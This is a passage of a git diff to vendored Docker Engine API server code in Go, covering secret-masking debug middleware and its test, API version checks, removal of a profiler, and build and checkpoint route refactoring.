@@ -54,23 +54,41 @@ func DebugRequestMiddleware(handler func(ctx context.Context, w http.ResponseWri
 	}
 }
 
-func maskSecretKeys(inp interface{}) {
+func maskSecretKeys(inp interface{}, path string) {
+	// Remove any query string from the path
+	idx := strings.Index(path, "?")
+	if idx != -1 {
+		path = path[:idx]
+	}
+	// Remove trailing / characters
+	path = strings.TrimRight(path, "/")
+
 	if arr, ok := inp.([]interface{}); ok {
 		for _, f := range arr {
-			maskSecretKeys(f)
+			maskSecretKeys(f, path)
 		}
 		return
 	}
+
 	if form, ok := inp.(map[string]interface{}); ok {
 	loop0:
 		for k, v := range form {
-			for _, m := range []string{"password", "secret", "jointoken", "unlockkey"} {
+			for _, m := range []string{"password", "secret", "jointoken", "unlockkey", "signingcakey"} {
 				if strings.EqualFold(m, k) {
 					form[k] = "*****"
 					continue loop0
 				}
 			}
-			maskSecretKeys(v)
+			maskSecretKeys(v, path)
+		}
+
+		// Route-specific redactions
+		if strings.HasSuffix(path, "/secrets/create") {
+			for k := range form {
+				if k == "Data" {
+					form[k] = "*****"
+				}
+			}
 		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/api/server/middleware/debug_test.go b/vendor/github.com/docker/docker/api/server/middleware/debug_test.go
new file mode 100644
index 0000000000..a64b73e0d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/middleware/debug_test.go
@@ -0,0 +1,59 @@
+package middleware // import "github.com/docker/docker/api/server/middleware"
+
+import (
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestMaskSecretKeys(t *testing.T) {
+	tests := []struct {
+		path     string
+		input    map[string]interface{}
+		expected map[string]interface{}
+	}{
+		{
+			path:     "/v1.30/secrets/create",
+			input:    map[string]interface{}{"Data": "foo", "Name": "name", "Labels": map[string]interface{}{}},
+			expected: map[string]interface{}{"Data": "*****", "Name": "name", "Labels": map[string]interface{}{}},
+		},
+		{
+			path:     "/v1.30/secrets/create//",
+			input:    map[string]interface{}{"Data": "foo", "Name": "name", "Labels": map[string]interface{}{}},
+			expected: map[string]interface{}{"Data": "*****", "Name": "name", "Labels": map[string]interface{}{}},
+		},
+
+		{
+			path:     "/secrets/create?key=val",
+			input:    map[string]interface{}{"Data": "foo", "Name": "name", "Labels": map[string]interface{}{}},
+			expected: map[string]interface{}{"Data": "*****", "Name": "name", "Labels": map[string]interface{}{}},
+		},
+		{
+			path: "/v1.30/some/other/path",
+			input: map[string]interface{}{
+				"password": "pass",
+				"other": map[string]interface{}{
+					"secret":       "secret",
+					"jointoken":    "jointoken",
+					"unlockkey":    "unlockkey",
+					"signingcakey": "signingcakey",
+				},
+			},
+			expected: map[string]interface{}{
+				"password": "*****",
+				"other": map[string]interface{}{
+					"secret":       "*****",
+					"jointoken":    "*****",
+					"unlockkey":    "*****",
+					"signingcakey": "*****",
+				},
+			},
+		},
+	}
+
+	for _, testcase := range tests {
+		maskSecretKeys(testcase.input, testcase.path)
+		assert.Check(t, is.DeepEqual(testcase.expected, testcase.input))
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware/experimental.go b/vendor/github.com/docker/docker/api/server/middleware/experimental.go
index b8f56e88b4..4df5decce4 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/experimental.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/experimental.go
@@ -1,9 +1,8 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
+	"context"
 	"net/http"
-
-	"golang.org/x/net/context"
 )
 
 // ExperimentalMiddleware is a the middleware in charge of adding the
diff --git a/vendor/github.com/docker/docker/api/server/middleware/middleware.go b/vendor/github.com/docker/docker/api/server/middleware/middleware.go
index dc1f5bfa0d..43483f1e4c 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/middleware.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/middleware.go
@@ -1,9 +1,8 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
+	"context"
 	"net/http"
-
-	"golang.org/x/net/context"
 )
 
 // Middleware is an interface to allow the use of ordinary functions as Docker API filters.
diff --git a/vendor/github.com/docker/docker/api/server/middleware/version.go b/vendor/github.com/docker/docker/api/server/middleware/version.go
index 11014659e5..88b11ca377 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/version.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/version.go
@@ -1,13 +1,13 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
+	"context"
 	"fmt"
 	"net/http"
 	"runtime"
 
-	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types/versions"
-	"golang.org/x/net/context"
 )
 
 // VersionMiddleware is a middleware that
@@ -28,22 +28,37 @@ func NewVersionMiddleware(s, d, m string) VersionMiddleware {
 	}
 }
 
+type versionUnsupportedError struct {
+	version, minVersion, maxVersion string
+}
+
+func (e versionUnsupportedError) Error() string {
+	if e.minVersion != "" {
+		return fmt.Sprintf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", e.version, e.minVersion)
+	}
+	return fmt.Sprintf("client version %s is too new. Maximum supported API version is %s", e.version, e.maxVersion)
+}
+
+func (e versionUnsupportedError) InvalidParameter() {}
+
 // WrapHandler returns a new handler function wrapping the previous one in the request chain.
 func (v VersionMiddleware) WrapHandler(handler func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error) func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		w.Header().Set("Server", fmt.Sprintf("Docker/%s (%s)", v.serverVersion, runtime.GOOS))
+		w.Header().Set("API-Version", v.defaultVersion)
+		w.Header().Set("OSType", runtime.GOOS)
+
 		apiVersion := vars["version"]
 		if apiVersion == "" {
 			apiVersion = v.defaultVersion
 		}
-
 		if versions.LessThan(apiVersion, v.minVersion) {
-			return errors.NewBadRequestError(fmt.Errorf("client version %s is too old. Minimum supported API version is %s, please upgrade your client to a newer version", apiVersion, v.minVersion))
+			return versionUnsupportedError{version: apiVersion, minVersion: v.minVersion}
 		}
-
-		header := fmt.Sprintf("Docker/%s (%s)", v.serverVersion, runtime.GOOS)
-		w.Header().Set("Server", header)
-		w.Header().Set("API-Version", v.defaultVersion)
-		ctx = context.WithValue(ctx, "api-version", apiVersion)
+		if versions.GreaterThan(apiVersion, v.defaultVersion) {
+			return versionUnsupportedError{version: apiVersion, maxVersion: v.defaultVersion}
+		}
+		ctx = context.WithValue(ctx, httputils.APIVersionKey, apiVersion)
 		return handler(ctx, w, r, vars)
 	}
 
diff --git a/vendor/github.com/docker/docker/api/server/middleware/version_test.go b/vendor/github.com/docker/docker/api/server/middleware/version_test.go
index 9e72efd78d..edbc0bcaa5 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/version_test.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/version_test.go
@@ -1,41 +1,73 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
+	"context"
 	"net/http"
 	"net/http/httptest"
-	"strings"
+	"runtime"
 	"testing"
 
 	"github.com/docker/docker/api/server/httputils"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-func TestVersionMiddleware(t *testing.T) {
+func TestVersionMiddlewareVersion(t *testing.T) {
+	defaultVersion := "1.10.0"
+	minVersion := "1.2.0"
+	expectedVersion := defaultVersion
 	handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-		if httputils.VersionFromContext(ctx) == "" {
-			t.Fatalf("Expected version, got empty string")
-		}
+		v := httputils.VersionFromContext(ctx)
+		assert.Check(t, is.Equal(expectedVersion, v))
 		return nil
 	}
 
-	defaultVersion := "1.10.0"
-	minVersion := "1.2.0"
 	m := NewVersionMiddleware(defaultVersion, defaultVersion, minVersion)
 	h := m.WrapHandler(handler)
 
 	req, _ := http.NewRequest("GET", "/containers/json", nil)
 	resp := httptest.NewRecorder()
 	ctx := context.Background()
-	if err := h(ctx, resp, req, map[string]string{}); err != nil {
-		t.Fatal(err)
+
+	tests := []struct {
+		reqVersion      string
+		expectedVersion string
+		errString       string
+	}{
+		{
+			expectedVersion: "1.10.0",
+		},
+		{
+			reqVersion:      "1.9.0",
+			expectedVersion: "1.9.0",
+		},
+		{
+			reqVersion: "0.1",
+			errString:  "client version 0.1 is too old. Minimum supported API version is 1.2.0, please upgrade your client to a newer version",
+		},
+		{
+			reqVersion: "9999.9999",
+			errString:  "client version 9999.9999 is too new. Maximum supported API version is 1.10.0",
+		},
+	}
+
+	for _, test := range tests {
+		expectedVersion = test.expectedVersion
+
+		err := h(ctx, resp, req, map[string]string{"version": test.reqVersion})
+
+		if test.errString != "" {
+			assert.Check(t, is.Error(err, test.errString))
+		} else {
+			assert.Check(t, err)
+		}
 	}
 }
 
-func TestVersionMiddlewareWithErrors(t *testing.T) {
+func TestVersionMiddlewareWithErrorsReturnsHeaders(t *testing.T) {
 	handler := func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-		if httputils.VersionFromContext(ctx) == "" {
-			t.Fatalf("Expected version, got empty string")
-		}
+		v := httputils.VersionFromContext(ctx)
+		assert.Check(t, len(v) != 0)
 		return nil
 	}
 
@@ -50,8 +82,11 @@ func TestVersionMiddlewareWithErrors(t *testing.T) {
 
 	vars := map[string]string{"version": "0.1"}
 	err := h(ctx, resp, req, vars)
+	assert.Check(t, is.ErrorContains(err, ""))
 
-	if !strings.Contains(err.Error(), "client version 0.1 is too old. Minimum supported API version is 1.2.0") {
-		t.Fatalf("Expected too old client error, got %v", err)
-	}
+	hdr := resp.Result().Header
+	assert.Check(t, is.Contains(hdr.Get("Server"), "Docker/"+defaultVersion))
+	assert.Check(t, is.Contains(hdr.Get("Server"), runtime.GOOS))
+	assert.Check(t, is.Equal(hdr.Get("API-Version"), defaultVersion))
+	assert.Check(t, is.Equal(hdr.Get("OSType"), runtime.GOOS))
 }
diff --git a/vendor/github.com/docker/docker/api/server/profiler.go b/vendor/github.com/docker/docker/api/server/profiler.go
deleted file mode 100644
index 8bf8384fdb..0000000000
--- a/vendor/github.com/docker/docker/api/server/profiler.go
+++ /dev/null
@@ -1,41 +0,0 @@
-package server
-
-import (
-	"expvar"
-	"fmt"
-	"net/http"
-	"net/http/pprof"
-
-	"github.com/gorilla/mux"
-)
-
-const debugPathPrefix = "/debug/"
-
-func profilerSetup(mainRouter *mux.Router) {
-	var r = mainRouter.PathPrefix(debugPathPrefix).Subrouter()
-	r.HandleFunc("/vars", expVars)
-	r.HandleFunc("/pprof/", pprof.Index)
-	r.HandleFunc("/pprof/cmdline", pprof.Cmdline)
-	r.HandleFunc("/pprof/profile", pprof.Profile)
-	r.HandleFunc("/pprof/symbol", pprof.Symbol)
-	r.HandleFunc("/pprof/trace", pprof.Trace)
-	r.HandleFunc("/pprof/block", pprof.Handler("block").ServeHTTP)
-	r.HandleFunc("/pprof/heap", pprof.Handler("heap").ServeHTTP)
-	r.HandleFunc("/pprof/goroutine", pprof.Handler("goroutine").ServeHTTP)
-	r.HandleFunc("/pprof/threadcreate", pprof.Handler("threadcreate").ServeHTTP)
-}
-
-// Replicated from expvar.go as not public.
-func expVars(w http.ResponseWriter, r *http.Request) {
-	first := true
-	w.Header().Set("Content-Type", "application/json; charset=utf-8")
-	fmt.Fprintf(w, "{\n")
-	expvar.Do(func(kv expvar.KeyValue) {
-		if !first {
-			fmt.Fprintf(w, ",\n")
-		}
-		first = false
-		fmt.Fprintf(w, "%q: %s", kv.Key, kv.Value)
-	})
-	fmt.Fprintf(w, "\n}\n")
-}
diff --git a/vendor/github.com/docker/docker/api/server/router/build/backend.go b/vendor/github.com/docker/docker/api/server/router/build/backend.go
index 0f01c11af4..2ceae9d946 100644
--- a/vendor/github.com/docker/docker/api/server/router/build/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/build/backend.go
@@ -1,20 +1,24 @@
-package build
+package build // import "github.com/docker/docker/api/server/router/build"
 
 import (
-	"io"
+	"context"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
-	"golang.org/x/net/context"
 )
 
 // Backend abstracts an image builder whose only purpose is to build an image referenced by an imageID.
 type Backend interface {
-	// Build builds a Docker image referenced by an imageID string.
-	//
-	// Note: Tagging an image should not be done by a Builder, it should instead be done
-	// by the caller.
-	//
+	// Build a Docker image returning the id of the image
 	// TODO: make this return a reference instead of string
-	BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error)
+	Build(context.Context, backend.BuildConfig) (string, error)
+
+	// Prune build cache
+	PruneCache(context.Context) (*types.BuildCachePruneReport, error)
+
+	Cancel(context.Context, string) error
+}
+
+type experimentalProvider interface {
+	HasExperimental() bool
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/build/build.go b/vendor/github.com/docker/docker/api/server/router/build/build.go
index 959498e0f1..811cd39181 100644
--- a/vendor/github.com/docker/docker/api/server/router/build/build.go
+++ b/vendor/github.com/docker/docker/api/server/router/build/build.go
@@ -1,18 +1,17 @@
-package build
+package build // import "github.com/docker/docker/api/server/router/build"
 
 import "github.com/docker/docker/api/server/router"
 
 // buildRouter is a router to talk with the build controller
 type buildRouter struct {
 	backend Backend
+	daemon  experimentalProvider
 	routes  []router.Route
 }
 
 // NewRouter initializes a new build router
-func NewRouter(b Backend) router.Router {
-	r := &buildRouter{
-		backend: b,
-	}
+func NewRouter(b Backend, d experimentalProvider) router.Router {
+	r := &buildRouter{backend: b, daemon: d}
 	r.initRoutes()
 	return r
 }
@@ -24,6 +23,8 @@ func (r *buildRouter) Routes() []router.Route {
 
 func (r *buildRouter) initRoutes() {
 	r.routes = []router.Route{
-		router.Cancellable(router.NewPostRoute("/build", r.postBuild)),
+		router.NewPostRoute("/build", r.postBuild, router.WithCancel),
+		router.NewPostRoute("/build/prune", r.postPrune, router.WithCancel),
+		router.NewPostRoute("/build/cancel", r.postCancel),
 	}
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/build/build_routes.go b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go
index 75425b19fb..2d73e9b1f3 100644
--- a/vendor/github.com/docker/docker/api/server/router/build/build_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/build/build_routes.go
@@ -1,7 +1,9 @@
-package build
+package build // import "github.com/docker/docker/api/server/router/build"
 
 import (
+	"bufio"
 	"bytes"
+	"context"
 	"encoding/base64"
 	"encoding/json"
 	"fmt"
@@ -12,19 +14,29 @@ import (
 	"strings"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/progress"
 	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/system"
 	"github.com/docker/go-units"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
+type invalidIsolationError string
+
+func (e invalidIsolationError) Error() string {
+	return fmt.Sprintf("Unsupported isolation: %q", string(e))
+}
+
+func (e invalidIsolationError) InvalidParameter() {}
+
 func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBuildOptions, error) {
 	version := httputils.VersionFromContext(ctx)
 	options := &types.ImageBuildOptions{}
@@ -53,8 +65,19 @@ func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBui
 	options.CgroupParent = r.FormValue("cgroupparent")
 	options.NetworkMode = r.FormValue("networkmode")
 	options.Tags = r.Form["t"]
+	options.ExtraHosts = r.Form["extrahosts"]
 	options.SecurityOpt = r.Form["securityopt"]
 	options.Squash = httputils.BoolValue(r, "squash")
+	options.Target = r.FormValue("target")
+	options.RemoteContext = r.FormValue("remote")
+	if versions.GreaterThanOrEqualTo(version, "1.32") {
+		apiPlatform := r.FormValue("platform")
+		p := system.ParsePlatform(apiPlatform)
+		if err := system.ValidatePlatform(p); err != nil {
+			return nil, errdefs.InvalidParameter(errors.Errorf("invalid platform: %s", err))
+		}
+		options.Platform = p.OS
+	}
 
 	if r.Form.Get("shmsize") != "" {
 		shmSize, err := strconv.ParseInt(r.Form.Get("shmsize"), 10, 64)
@@ -66,27 +89,24 @@ func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBui
 
 	if i := container.Isolation(r.FormValue("isolation")); i != "" {
 		if !container.Isolation.IsValid(i) {
-			return nil, fmt.Errorf("Unsupported isolation: %q", i)
+			return nil, invalidIsolationError(i)
 		}
 		options.Isolation = i
 	}
 
 	if runtime.GOOS != "windows" && options.SecurityOpt != nil {
-		return nil, fmt.Errorf("the daemon on this platform does not support --security-opt to build")
+		return nil, errdefs.InvalidParameter(errors.New("The daemon on this platform does not support setting security options on build"))
 	}
 
 	var buildUlimits = []*units.Ulimit{}
 	ulimitsJSON := r.FormValue("ulimits")
 	if ulimitsJSON != "" {
 		if err := json.Unmarshal([]byte(ulimitsJSON), &buildUlimits); err != nil {
-			return nil, err
+			return nil, errors.Wrap(errdefs.InvalidParameter(err), "error reading ulimit settings")
 		}
 		options.Ulimits = buildUlimits
 	}
 
-	var buildArgs = map[string]*string{}
-	buildArgsJSON := r.FormValue("buildargs")
-
 	// Note that there are two ways a --build-arg might appear in the
 	// json of the query param:
 	//     "foo":"bar"
@@ -99,77 +119,108 @@ func newImageBuildOptions(ctx context.Context, r *http.Request) (*types.ImageBui
 	// the fact they mentioned it, we need to pass that along to the builder
 	// so that it can print a warning about "foo" being unused if there is
 	// no "ARG foo" in the Dockerfile.
+	buildArgsJSON := r.FormValue("buildargs")
 	if buildArgsJSON != "" {
+		var buildArgs = map[string]*string{}
 		if err := json.Unmarshal([]byte(buildArgsJSON), &buildArgs); err != nil {
-			return nil, err
+			return nil, errors.Wrap(errdefs.InvalidParameter(err), "error reading build args")
 		}
 		options.BuildArgs = buildArgs
 	}
 
-	var labels = map[string]string{}
 	labelsJSON := r.FormValue("labels")
 	if labelsJSON != "" {
+		var labels = map[string]string{}
 		if err := json.Unmarshal([]byte(labelsJSON), &labels); err != nil {
-			return nil, err
+			return nil, errors.Wrap(errdefs.InvalidParameter(err), "error reading labels")
 		}
 		options.Labels = labels
 	}
 
-	var cacheFrom = []string{}
 	cacheFromJSON := r.FormValue("cachefrom")
 	if cacheFromJSON != "" {
+		var cacheFrom = []string{}
 		if err := json.Unmarshal([]byte(cacheFromJSON), &cacheFrom); err != nil {
 			return nil, err
 		}
 		options.CacheFrom = cacheFrom
 	}
+	options.SessionID = r.FormValue("session")
+	options.BuildID = r.FormValue("buildid")
+	builderVersion, err := parseVersion(r.FormValue("version"))
+	if err != nil {
+		return nil, err
+	}
+	options.Version = builderVersion
 
 	return options, nil
 }
 
-type syncWriter struct {
-	w  io.Writer
-	mu sync.Mutex
+func parseVersion(s string) (types.BuilderVersion, error) {
+	if s == "" || s == string(types.BuilderV1) {
+		return types.BuilderV1, nil
+	}
+	if s == string(types.BuilderBuildKit) {
+		return types.BuilderBuildKit, nil
+	}
+	return "", errors.Errorf("invalid version %s", s)
 }
 
-func (s *syncWriter) Write(b []byte) (count int, err error) {
-	s.mu.Lock()
-	count, err = s.w.Write(b)
-	s.mu.Unlock()
-	return
+func (br *buildRouter) postPrune(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	report, err := br.backend.PruneCache(ctx)
+	if err != nil {
+		return err
+	}
+	return httputils.WriteJSON(w, http.StatusOK, report)
+}
+
+func (br *buildRouter) postCancel(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	w.Header().Set("Content-Type", "application/json")
+
+	id := r.FormValue("id")
+	if id == "" {
+		return errors.Errorf("build ID not provided")
+	}
+
+	return br.backend.Cancel(ctx, id)
 }
 
 func (br *buildRouter) postBuild(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	var (
-		authConfigs        = map[string]types.AuthConfig{}
-		authConfigsEncoded = r.Header.Get("X-Registry-Config")
-		notVerboseBuffer   = bytes.NewBuffer(nil)
+		notVerboseBuffer = bytes.NewBuffer(nil)
+		version          = httputils.VersionFromContext(ctx)
 	)
 
-	if authConfigsEncoded != "" {
-		authConfigsJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authConfigsEncoded))
-		if err := json.NewDecoder(authConfigsJSON).Decode(&authConfigs); err != nil {
-			// for a pull it is not an error if no auth was given
-			// to increase compatibility with the existing api it is defaulting
-			// to be empty.
-		}
-	}
-
 	w.Header().Set("Content-Type", "application/json")
 
-	output := ioutils.NewWriteFlusher(w)
+	body := r.Body
+	var ww io.Writer = w
+	if body != nil {
+		// there is a possibility that output is written before request body
+		// has been fully read so we need to protect against it.
+		// this can be removed when
+		// https://github.com/golang/go/issues/15527
+		// https://github.com/golang/go/issues/22209
+		// has been fixed
+		body, ww = wrapOutputBufferedUntilRequestRead(body, ww)
+	}
+
+	output := ioutils.NewWriteFlusher(ww)
 	defer output.Close()
-	sf := streamformatter.NewJSONStreamFormatter()
+
 	errf := func(err error) error {
+
 		if httputils.BoolValue(r, "q") && notVerboseBuffer.Len() > 0 {
 			output.Write(notVerboseBuffer.Bytes())
 		}
+
+		logrus.Debugf("isflushed %v", output.Flushed())
 		// Do not write the error in the http output if it's still empty.
 		// This prevents from writing a 200(OK) when there is an internal error.
 		if !output.Flushed() {
 			return err
 		}
-		_, err = w.Write(sf.FormatError(err))
+		_, err = output.Write(streamformatter.FormatError(err))
 		if err != nil {
 			logrus.Warnf("could not write error response: %v", err)
 		}
@@ -180,46 +231,186 @@ func (br *buildRouter) postBuild(ctx context.Context, w http.ResponseWriter, r *
 	if err != nil {
 		return errf(err)
 	}
-	buildOptions.AuthConfigs = authConfigs
+	buildOptions.AuthConfigs = getAuthConfigs(r.Header)
+
+	if buildOptions.Squash && !br.daemon.HasExperimental() {
+		return errdefs.InvalidParameter(errors.New("squash is only supported with experimental mode"))
+	}
 
-	remoteURL := r.FormValue("remote")
+	out := io.Writer(output)
+	if buildOptions.SuppressOutput {
+		out = notVerboseBuffer
+	}
 
 	// Currently, only used if context is from a remote url.
 	// Look at code in DetectContextFromRemoteURL for more information.
 	createProgressReader := func(in io.ReadCloser) io.ReadCloser {
-		progressOutput := sf.NewProgressOutput(output, true)
-		if buildOptions.SuppressOutput {
-			progressOutput = sf.NewProgressOutput(notVerboseBuffer, true)
-		}
-		return progress.NewProgressReader(in, progressOutput, r.ContentLength, "Downloading context", remoteURL)
+		progressOutput := streamformatter.NewJSONProgressOutput(out, true)
+		return progress.NewProgressReader(in, progressOutput, r.ContentLength, "Downloading context", buildOptions.RemoteContext)
 	}
 
-	out := io.Writer(output)
+	if buildOptions.Version == types.BuilderBuildKit && !br.daemon.HasExperimental() {
+		return errdefs.InvalidParameter(errors.New("buildkit is only supported with experimental mode"))
+	}
+
+	wantAux := versions.GreaterThanOrEqualTo(version, "1.30")
+
+	imgID, err := br.backend.Build(ctx, backend.BuildConfig{
+		Source:         body,
+		Options:        buildOptions,
+		ProgressWriter: buildProgressWriter(out, wantAux, createProgressReader),
+	})
+	if err != nil {
+		return errf(err)
+	}
+
+	// Everything worked so if -q was provided the output from the daemon
+	// should be just the image ID and we'll print that to stdout.
 	if buildOptions.SuppressOutput {
-		out = notVerboseBuffer
+		fmt.Fprintln(streamformatter.NewStdoutWriter(output), imgID)
+	}
+	return nil
+}
+
+func getAuthConfigs(header http.Header) map[string]types.AuthConfig {
+	authConfigs := map[string]types.AuthConfig{}
+	authConfigsEncoded := header.Get("X-Registry-Config")
+
+	if authConfigsEncoded == "" {
+		return authConfigs
 	}
+
+	authConfigsJSON := base64.NewDecoder(base64.URLEncoding, strings.NewReader(authConfigsEncoded))
+	// Pulling an image does not error when no auth is provided so to remain
+	// consistent with the existing api decode errors are ignored
+	json.NewDecoder(authConfigsJSON).Decode(&authConfigs)
+	return authConfigs
+}
+
+type syncWriter struct {
+	w  io.Writer
+	mu sync.Mutex
+}
+
+func (s *syncWriter) Write(b []byte) (count int, err error) {
+	s.mu.Lock()
+	count, err = s.w.Write(b)
+	s.mu.Unlock()
+	return
+}
+
+func buildProgressWriter(out io.Writer, wantAux bool, createProgressReader func(io.ReadCloser) io.ReadCloser) backend.ProgressWriter {
 	out = &syncWriter{w: out}
-	stdout := &streamformatter.StdoutFormatter{Writer: out, StreamFormatter: sf}
-	stderr := &streamformatter.StderrFormatter{Writer: out, StreamFormatter: sf}
 
-	pg := backend.ProgressWriter{
+	var aux *streamformatter.AuxFormatter
+	if wantAux {
+		aux = &streamformatter.AuxFormatter{Writer: out}
+	}
+
+	return backend.ProgressWriter{
 		Output:             out,
-		StdoutFormatter:    stdout,
-		StderrFormatter:    stderr,
+		StdoutFormatter:    streamformatter.NewStdoutWriter(out),
+		StderrFormatter:    streamformatter.NewStderrWriter(out),
+		AuxFormatter:       aux,
 		ProgressReaderFunc: createProgressReader,
 	}
+}
+
+type flusher interface {
+	Flush()
+}
+
+func wrapOutputBufferedUntilRequestRead(rc io.ReadCloser, out io.Writer) (io.ReadCloser, io.Writer) {
+	var fl flusher = &ioutils.NopFlusher{}
+	if f, ok := out.(flusher); ok {
+		fl = f
+	}
 
-	imgID, err := br.backend.BuildFromContext(ctx, r.Body, remoteURL, buildOptions, pg)
+	w := &wcf{
+		buf:     bytes.NewBuffer(nil),
+		Writer:  out,
+		flusher: fl,
+	}
+	r := bufio.NewReader(rc)
+	_, err := r.Peek(1)
 	if err != nil {
-		return errf(err)
+		return rc, out
+	}
+	rc = &rcNotifier{
+		Reader: r,
+		Closer: rc,
+		notify: w.notify,
 	}
+	return rc, w
+}
 
-	// Everything worked so if -q was provided the output from the daemon
-	// should be just the image ID and we'll print that to stdout.
-	if buildOptions.SuppressOutput {
-		stdout := &streamformatter.StdoutFormatter{Writer: output, StreamFormatter: sf}
-		fmt.Fprintf(stdout, "%s\n", string(imgID))
+type rcNotifier struct {
+	io.Reader
+	io.Closer
+	notify func()
+}
+
+func (r *rcNotifier) Read(b []byte) (int, error) {
+	n, err := r.Reader.Read(b)
+	if err != nil {
+		r.notify()
 	}
+	return n, err
+}
 
-	return nil
+func (r *rcNotifier) Close() error {
+	r.notify()
+	return r.Closer.Close()
+}
+
+type wcf struct {
+	io.Writer
+	flusher
+	mu      sync.Mutex
+	ready   bool
+	buf     *bytes.Buffer
+	flushed bool
+}
+
+func (w *wcf) Flush() {
+	w.mu.Lock()
+	w.flushed = true
+	if !w.ready {
+		w.mu.Unlock()
+		return
+	}
+	w.mu.Unlock()
+	w.flusher.Flush()
+}
+
+func (w *wcf) Flushed() bool {
+	w.mu.Lock()
+	b := w.flushed
+	w.mu.Unlock()
+	return b
+}
+
+func (w *wcf) Write(b []byte) (int, error) {
+	w.mu.Lock()
+	if !w.ready {
+		n, err := w.buf.Write(b)
+		w.mu.Unlock()
+		return n, err
+	}
+	w.mu.Unlock()
+	return w.Writer.Write(b)
+}
+
+func (w *wcf) notify() {
+	w.mu.Lock()
+	if !w.ready {
+		if w.buf.Len() > 0 {
+			io.Copy(w.Writer, w.buf)
+		}
+		if w.flushed {
+			w.flusher.Flush()
+		}
+		w.ready = true
+	}
+	w.mu.Unlock()
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
index 8810f88b72..90c5d1a984 100644
--- a/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/backend.go
@@ -1,4 +1,4 @@
-package checkpoint
+package checkpoint // import "github.com/docker/docker/api/server/router/checkpoint"
 
 import "github.com/docker/docker/api/types"
 
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
index c1e93926f5..37bd0bdad8 100644
--- a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint.go
@@ -1,4 +1,4 @@
-package checkpoint
+package checkpoint // import "github.com/docker/docker/api/server/router/checkpoint"
 
 import (
 	"github.com/docker/docker/api/server/httputils"
@@ -29,8 +29,8 @@ func (r *checkpointRouter) Routes() []router.Route {
 
 func (r *checkpointRouter) initRoutes() {
 	r.routes = []router.Route{
-		router.Experimental(router.NewGetRoute("/containers/{name:.*}/checkpoints", r.getContainerCheckpoints)),
-		router.Experimental(router.NewPostRoute("/containers/{name:.*}/checkpoints", r.postContainerCheckpoint)),
-		router.Experimental(router.NewDeleteRoute("/containers/{name}/checkpoints/{checkpoint}", r.deleteContainerCheckpoint)),
+		router.NewGetRoute("/containers/{name:.*}/checkpoints", r.getContainerCheckpoints, router.Experimental),
+		router.NewPostRoute("/containers/{name:.*}/checkpoints", r.postContainerCheckpoint, router.Experimental),
+		router.NewDeleteRoute("/containers/{name}/checkpoints/{checkpoint}", r.deleteContainerCheckpoint, router.Experimental),
 	}
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
index f988431191..6c03f976e2 100644
--- a/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/checkpoint/checkpoint_routes.go
@@ -1,12 +1,12 @@
-package checkpoint
